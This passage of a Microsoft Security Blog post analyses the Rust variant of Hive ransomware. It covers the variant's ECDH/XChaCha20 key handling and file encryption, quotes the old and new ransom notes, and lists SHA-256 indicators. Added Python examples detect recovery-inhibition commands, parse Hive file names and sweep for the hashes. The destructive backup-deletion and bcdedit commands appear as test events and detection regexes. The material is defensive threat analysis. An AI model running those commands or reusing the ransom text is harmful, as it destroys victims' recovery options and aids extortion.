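These commands are the recovery-inhibition step shared by most ransomware families, which makes them worth a dedicated detection. The Python below is an added example, not Microsoft’s or Hive’s code: it matches process-creation command lines against rules derived from the seven commands listed above, tolerating path prefixes, quoting, case and spacing, and only flags a host once several distinct techniques appear, since a lone vssadmin or wbadmin call is common in legitimate backup maintenance. The event records, host names and rule names are constructed for the demonstration; in production the same logic runs over the command-line field of Sysmon Event ID 1 or Security event 4688.

```python
import re

# One rule per command in the list above (the regexes are mine, not Microsoft's). They run
# on a normalized command line, so paths, quotes, case and spacing do not defeat them.
RECOVERY_INHIBIT_RULES = {
    "vssadmin_delete_shadows":    re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b"),
    "wmic_shadowcopy_delete":     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
    "wbadmin_delete_systemstate": re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\b.*\bsystemstatebackup\b"),
    "wbadmin_delete_catalog":     re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\b.*\bcatalog\b"),
    "bcdedit_disable_recovery":   re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\b\s+no\b"),
    "bcdedit_ignore_failures":    re.compile(r"\bbcdedit(\.exe)?\b.*\bbootstatuspolicy\b\s+ignoreallfailures\b"),
}


def normalize(cmdline: str) -> str:
    """Lower-case, strip quote characters and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "").replace("'", "")).strip().lower()


def match_rules(cmdline: str):
    """Return the names of every rule the command line triggers (empty list if none)."""
    n = normalize(cmdline)
    return [name for name, rx in RECOVERY_INHIBIT_RULES.items() if rx.search(n)]


def triage(events, min_distinct: int = 2):
    """Aggregate matches per host over the queried window. One technique alone is common in
    admin scripts; several distinct ones together is the pattern the process list above shows."""
    per_host = {}
    for ev in events:
        for rule in match_rules(ev["cmd"]):
            per_host.setdefault(ev["host"], set()).add(rule)
    return {host: sorted(rules) for host, rules in per_host.items() if len(rules) >= min_distinct}


# Constructed process-creation events (host and command line only); not real telemetry.
CONSTRUCTED_EVENTS = [
    {"host": "WS01", "cmd": "vssadmin.exe list shadows"},                                  # benign
    {"host": "WS01", "cmd": '"C:\\Windows\\System32\\bcdedit.exe" /enum'},                   # benign
    {"host": "FS02", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "FS02", "cmd": "wmic.exe shadowcopy delete"},
    {"host": "FS02", "cmd": "wbadmin.exe delete systemstatebackup -keepVersions:3"},
    {"host": "FS02", "cmd": "bcdedit.exe /set {default} recoveryenabled No"},
    {"host": "FS02", "cmd": "BCDEDIT.EXE  /set {default}   bootstatuspolicy IgnoreAllFailures"},
    {"host": "DB03", "cmd": "wbadmin.exe delete catalog -quiet"},                            # lone call
]

if __name__ == "__main__":
    for host, rules in triage(CONSTRUCTED_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

The threshold is the tuning knob: `min_distinct=1` turns this into a noisy but complete inventory of every shadow-copy or boot-policy change, while the default of 2 is closer to what an analyst would page on.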

Ransom note

Hive’s ransom note has also changed, with the new version referencing the .key files with their new file name convention and adding a sentence about virtual machines (VMs).

The older variants had an embedded username and password (marked as hidden). In the new variant, the username and password are taken from the command line parameter -u and are labeled test_hive_username and test_hive_password.

Old ransom note text:

 Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.
To decrypt all the data and to prevent exfiltrated files to be disclosed at 
you will need to purchase our decryption software.
Please contact our sales department at:
      Login:    [REDACTED]
      Password: [REDACTED]
To get an access to .onion websites download and install Tor Browser at: (Tor Browser is not related to us)
Follow the guidelines below to avoid losing your data:
- Do not modify, rename or delete *.key.abc12 files. Your data will be 
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business.
   They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key. 
   They also don't care about your business. They believe that they are 
   good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.

New ransom note text:

Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.
To decrypt all the data and to prevent exfiltrated files to be disclosed at 
you will need to purchase our decryption software.
Please contact our sales department at:
      Login:    test_hive_username
      Password: test_hive_password
To get an access to .onion websites download and install Tor Browser at: (Tor Browser is not related to us)
Follow the guidelines below to avoid losing your data:
- Do not delete or reinstall VMs. There will be nothing to decrypt.
- Do not modify, rename or delete *.key files. Your data will be 
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business.
   They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key. 
   They also don't care about your business. They believe that they are 
   good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.


The most interesting change in the new Hive variant is its cryptography. The variant was first uploaded to VirusTotal on February 21, 2022, just a few days after a group of researchers from Kookmin University in South Korea published the paper “A Method for Decrypting Data Infected with Hive Ransomware” on February 17, 2022, so the rewrite must already have been under development when the paper appeared. The new variant first appeared in Microsoft threat data on February 22.

The new variant uses a different set of algorithms: Elliptic Curve Diffie-Hellman (ECDH) over Curve25519 and XChaCha20-Poly1305 (authenticated encryption built on the ChaCha20 symmetric cipher).

A unique encryption approach

The new Hive variant uses a unique approach to file encryption. Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes both sets to the root of the drive it encrypts, each with the .key extension.

To indicate which keys set was used to encrypt a file, the name of the .key file containing the corresponding encryption keys is appended to the name of the encrypted file on disk, followed by an underscore and then a Base64 string (Hive uses a custom Base64 character set that includes underscore and hyphen). Once Base64-decoded, the string contains two offsets, each pointing to a different location in the corresponding .key file. With these offsets, the attacker can decrypt the file.

For example, after running Hive, we got the following files dropped to the C:\ drive:

  • C:\3bcVwj6j.key
  • C:\l0Zn68cb.key

In this example, a file named myphoto.jpg would be renamed to C:\myphoto.jpg.l0Zn68cb_-B82BhIaGhI8. As we discuss in the following sections, the new variant’s keys set generation is entirely different from old variants. However, its actual file encryption is very similar.

Keys set generation

A buffer of 0xCFFF00 bytes is allocated and filled using two custom random-byte functions (labeled “random_num_gen” and “random_num_gen_2” for demonstration purposes). The first 0xA00000 bytes of the buffer are filled with random bytes; the remaining 0x2FFF00 bytes are a copy of the first 0x2FFF00 random bytes generated earlier in the same buffer.

The content of each such buffer is a keys set (a collection of symmetric keys). This allocation is performed twice, so there are two keys sets. During file encryption, the malware randomly selects different keys (byte sequences) for each file from one of the keys sets and encrypts the file by XORing those byte sequences with the file’s content.

Figure 6 – Original keys set generation
Figure 7 – Inside get_random_byte

A custom 64-byte hash is prepared for each keys set. This hash will be used later.

Figure 8 – Preparing the custom hash of the keys set

After the hash is computed and several other strings are decrypted, the encryption process takes the following steps:

  1. Generate victim_private_key using the same random-byte functions introduced above.
     Figure 9 – Generating victim_private_key
  2. Generate victim_public_key using ECDH with Curve25519. The input is victim_private_key and the basepoint is 9 followed by 31 zeros (embedded in the sample).
     Figure 10 – Generating victim_public_key
  3. Generate a 24-byte nonce for the XChaCha algorithm, used later in Poly1305-XChaCha20.
     Figure 11 – Generating a 24-byte nonce
  4. Generate shared_secret using ECDH with Curve25519. The input is victim_private_key and hive_public_key. Then shared_secret (as a key) and hive_public_key (as a nonce) are used to derive derived_key using ChaCha20.
     Figure 12 – Generating shared_secret
  5. Encrypt the keys set using Poly1305-XChaCha20. The values used for the encryption are the keys set, derived_key, nonce, and the embedded associated data (AD). This function encrypts the keys set and appends a 16-byte authentication tag at the end of the buffer of encrypted keys. It’s unclear if the authentication tag is ever checked.
     Figure 13 – Encrypting the keys set

Now that the keys set is encrypted, the nonce, victim_public_key, the now-encrypted keys set, and the authentication tag are copied one after another into a new buffer. This buffer (which we label encrypted_structure_1) is treated as a new keys set and is encrypted again using the same method described above, but with a second hive_public_key. In this second round the function produces a new nonce, a new victim_private_key, and so on; only the associated data stays the same.

Finally, the new buffer, which contains second_nonce, second_victim_public_key, and the encrypted encrypted_structure_1, is written to the root of the drive being encrypted (for example, C:\). The create_extension function generates a Base64 string from the first six bytes of the custom hash created earlier. This Base64 string serves as the file name, and the file’s extension is simply “.key”.

Figure 14 – Generating a Base64 string based on the first six bytes of the custom hash
Figure 15 – Using the Base64 string as the file name

The diagram below illustrates the encryption scheme described above:

Figure 16 – The keys set encryption scheme of the new Hive variant

As seen in the diagram above, “Keys sets encryption flow” is executed twice. In the first round it is executed with the original keys set as an input. In the second round it is executed with the “encrypted structure 1” as an input. In its second execution, all other input values are different except the AD (associated data) and the Basepoint 9.

Hence, the following values are new in the second execution: victim_private_key, victim_public_key, hive_public_key, nonce, shared_secret and derived_key.

File encryption

After both keys files are written to the disk, the multi-threaded file encryption starts. Before encrypting each file, the malware checks its name and extension against a list of strings. If there is a match, then the file will not be encrypted. For example, a file with .exe extension will not be encrypted if .exe is in the list of strings. It should be noted that this list is encrypted and decrypted during runtime.

The same file encryption method seen in old variants is used in the new one: two random numbers are generated and used as offsets to the keys set. Each offset is four bytes:

Figure 17 – Generating the offsets

For the encryption, the file’s content is XORed with bytes from the keys set, according to the offsets. The file bytes are XORed twice—once according to the first offset and a second time according to the second offset. Files are encrypted in blocks of 0x100000 bytes, with the maximum number of blocks at 100. There is an interval between the encrypted blocks as defined by block_space. After the encryption is finished in memory, the encrypted data is written to the disk, overwriting the original file.

Figure 18 – Calculation of number of blocks
Figure 19 – Actual encryption of the file bytes
Figure 20 – Reading a file, encrypting it, and writing it back to the disk

Looking at when create_extension is called once file encryption has started, we recognized a structure similar to the one in the previous variant:

Figure 21 – Creating the extension for the file

Let us look at the value (72 D7 A7 A3 F5 5B FF EF 21 6B 11 7C 2A 18 CD 00) at the address held in the r9 register just before create_extension is called on a file called EDBtmp.log:

Partial screenshot of a hexadecimal value

Recall that in the older variants, 0xFF was used as a delimiter to separate the key file name from the offset values. We can also see it here. Converting the first six bytes (72 D7 A7 A3 F5 5B) to Base64 yields the following:


And if we step over create_extension, the result is similar—we get cteno_Vb as the .key file name (note: Since Hive uses a different Base64 character set, “/” was replaced with “_”):

Partial screenshot of hexadecimal values
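The naming scheme described above (a .key file name derived from the first six bytes of the custom hash, then an underscore and a Base64 suffix holding the offsets) is something an analyst can verify and use for triage, because it tells which .key file each encrypted file depends on. The following Python is an added example, not code from the post or from Microsoft: it reproduces the cteno_Vb derivation from the quoted r9 bytes and parses the myphoto.jpg example from earlier in the post. It assumes Hive’s alphabet is the URL-safe Base64 alphabet (“/” replaced by “_”, as the post states, and “+” by “-”, which is an assumption), and it leaves the decoded suffix as raw bytes because the post does not state the byte order of the two offsets.

```python
import base64
import re

# Hive's Base64 alphabet as observed in the post: "/" becomes "_" and, by
# assumption, "+" becomes "-", i.e. the URL-safe alphabet without "=" padding.
def hive_b64encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def hive_b64decode(text: str) -> bytes:
    # Re-add the padding the malware strips so the standard decoder accepts it.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def key_file_name(custom_hash: bytes) -> str:
    """The .key file name: Base64 of the first six bytes of the 64-byte custom hash."""
    return hive_b64encode(custom_hash[:6])


# Buffer quoted in the post (r9 just before create_extension for EDBtmp.log):
# six hash bytes, the 0xFF delimiter, then the offset bytes.
R9_BUFFER = bytes.fromhex("72D7A7A3F55BFFEF216B117C2A18CD00")

# <original name>.<8-char key file name>_<Base64 suffix>
HIVE_NAME_RE = re.compile(
    r"^(?P<original>.+)\.(?P<keyfile>[A-Za-z0-9_-]{8})_(?P<suffix>[A-Za-z0-9_-]+)$"
)


def parse_encrypted_name(filename: str):
    """Split a Hive-renamed file name into its parts; None if it does not fit the pattern.

    The suffix is returned as raw bytes. The post says it encodes two offsets into the
    .key file but does not give their byte order, so no integer conversion is done here.
    """
    m = HIVE_NAME_RE.match(filename)
    if m is None:
        return None
    return {
        "original": m["original"],
        "key_file": m["keyfile"] + ".key",
        "offset_bytes": hive_b64decode(m["suffix"]),
    }


def triage(filenames):
    """Group file names by the .key file they depend on (key None = not Hive-renamed)."""
    groups = {}
    for name in filenames:
        parsed = parse_encrypted_name(name)
        groups.setdefault(parsed["key_file"] if parsed else None, []).append(name)
    return groups


if __name__ == "__main__":
    print(key_file_name(R9_BUFFER))  # cteno_Vb, matching the post
    print(parse_encrypted_name("myphoto.jpg.l0Zn68cb_-B82BhIaGhI8"))
    # Constructed sample listing (the second name is made up for illustration).
    print(triage([
        "myphoto.jpg.l0Zn68cb_-B82BhIaGhI8",
        "report.docx.3bcVwj6j_AAAAAAAAAAAA",
        "notes.txt",
    ]))
```

Running the script prints cteno_Vb for the quoted r9 bytes, which is the name the post reports after stepping over create_extension; the myphoto.jpg example resolves to l0Zn68cb.key with a nine-byte decoded suffix. Grouping a directory listing this way shows at a glance which encrypted files are tied to which .key file at the drive root.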

Microsoft will continue to monitor the Hive operators’ activity and implement protections for our customers. The current detections, advanced detections, and indicators of compromise (IOCs) in place across our security products are detailed below.

Recommended customer actions

The techniques used by the new Hive variant can be mitigated by adopting the security considerations provided below:

  • Use the included IOCs to investigate whether they exist in your environment and assess for potential intrusion.

Our recent blog on the ransomware-as-a-service economy has an exhaustive guide on how to protect yourself from ransomware threats that dives deep into each of the following areas. We encourage readers to refer to that blog for a comprehensive guide on:

For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
  • Use device discovery to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
  • Protect user identities and credentials using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.

Indicators of compromise (IOCs)

The list below is a partial list of the IOCs observed during our investigation and included in this blog. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator                                                          Type     Description
f4a39820dbff47fa1b68f83f575bc98ed33858b02341c5c0464a49be4e6c76d3   SHA-256  Hive Rust variant payload
88b1d8a85bf9101bc336b01b9af4345ed91d3ec761554d167fe59f73af73f037   SHA-256  Hive Rust variant payload
065208b037a2691eb75a14f97bdbd9914122655d42f6249d2cca419a1e4ba6f1   SHA-256  Hive Rust variant payload
33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724   SHA-256  Hive Rust variant payload
afab34235b7f170150f180c7afb9e3b4e504a84559bbd03ab71e64e3b6541149   SHA-256  Hive Rust variant payload
36759cab7043cd7561ac6c3968832b30c9a442eff4d536e901d4ff70aef4d32d   SHA-256  Hive Rust variant payload
481dc99903aa270d286f559b17194b1a25deca8a64a5ec4f13a066637900221e   SHA-256  Hive Rust variant payload
6e5d49f604730ef4c05cfe3f64a7790242e71b4ecf1dc5109d32e811acf0b053   SHA-256  Hive Rust variant payload
32ff0e5d87ec16544b6ff936d6fd58023925c3bdabaf962c492f6b078cb01914   SHA-256  Hive Rust variant payload

NOTE: These indicators shouldn’t be considered exhaustive for this observed activity.
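To act on the first recommended action above (checking the listed IOCs against your environment), here is an added Python example that is not the post’s or Microsoft’s own tooling: it embeds the nine SHA-256 indicators from the table, streams every regular file under a directory tree through SHA-256, and reports matches. The self_check function builds a constructed, benign fixture in a temporary directory so the sweep can be exercised without any real sample; the directory argument, function names, and chunk size are choices made for this example.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# SHA-256 indicators listed in the post for the Hive Rust variant payload.
HIVE_RUST_PAYLOAD_SHA256 = frozenset({
    "f4a39820dbff47fa1b68f83f575bc98ed33858b02341c5c0464a49be4e6c76d3",
    "88b1d8a85bf9101bc336b01b9af4345ed91d3ec761554d167fe59f73af73f037",
    "065208b037a2691eb75a14f97bdbd9914122655d42f6249d2cca419a1e4ba6f1",
    "33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724",
    "afab34235b7f170150f180c7afb9e3b4e504a84559bbd03ab71e64e3b6541149",
    "36759cab7043cd7561ac6c3968832b30c9a442eff4d536e901d4ff70aef4d32d",
    "481dc99903aa270d286f559b17194b1a25deca8a64a5ec4f13a066637900221e",
    "6e5d49f604730ef4c05cfe3f64a7790242e71b4ecf1dc5109d32e811acf0b053",
    "32ff0e5d87ec16544b6ff936d6fd58023925c3bdabaf962c492f6b078cb01914",
})


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep(root, iocs=HIVE_RUST_PAYLOAD_SHA256):
    """Walk `root` (symlinks are not followed) and return (path, sha256) for every
    regular file whose hash is in `iocs`. Unreadable files are skipped, not fatal."""
    wanted = {h.lower() for h in iocs}
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                digest = sha256_of_file(path)
            except OSError:
                continue
            if digest in wanted:
                hits.append((path, digest))
    return hits


def self_check() -> bool:
    """Constructed fixture (no malware involved): a benign file in a temp directory is
    found when its own hash is the indicator, and is not matched by the real IOC set."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "sample.bin"
        sample.write_bytes(b"constructed benign sample\n" * 1000)
        digest = sha256_of_file(sample)
        hit = sweep(tmp, {digest})
        miss = sweep(tmp)
        return hit == [(str(sample), digest)] and miss == []


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, digest in sweep(root):
        print(f"IOC match: {path} {digest}")
```

Run it as `python hive_ioc_sweep.py <directory>` (the script name is a placeholder). The indicator set is a frozenset so it can be extended from a threat-intelligence feed without changing the sweep; a hit should be treated as a trigger for investigation rather than proof of compromise on its own, in line with the note above that these indicators are not exhaustive.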


Microsoft 365 Defender

Microsoft Defender Antivirus

Microsoft Defender Antivirus provides detection for this threat under the following family names with build version 1.367.405.0 or later.

  • Ransom:Win64/Hive
  • Ransom:Win32/Hive

Microsoft Defender for Endpoint detection

Microsoft Defender for Endpoint customers may see any one or a combination of the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of a Hive compromise, but should be investigated:

  • Ransomware behavior detected in the file system
  • File backups were deleted
  • Possible ransomware infection modifying multiple files
  • Possible ransomware activity
  • Ransomware-linked emerging threat activity group detected

Advanced hunting queries

Microsoft Sentinel

To locate possible Hive ransomware activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:

Identify Hive ransomware IOCs

This query identifies a match across various data feeds for IOCs related to Hive ransomware.

Identify backup deletion

This hunting query helps detect a ransomware’s attempt to delete backup files.

Identify Microsoft Defender Antivirus detection of Hive ransomware

This query looks for Microsoft Defender Antivirus detections related to the Hive ransomware and joins the alert with other data sources to surface additional information such as device, IP, signed-in users, etc.

The post Hive ransomware gets upgrades in Rust appeared first on Microsoft Security Blog.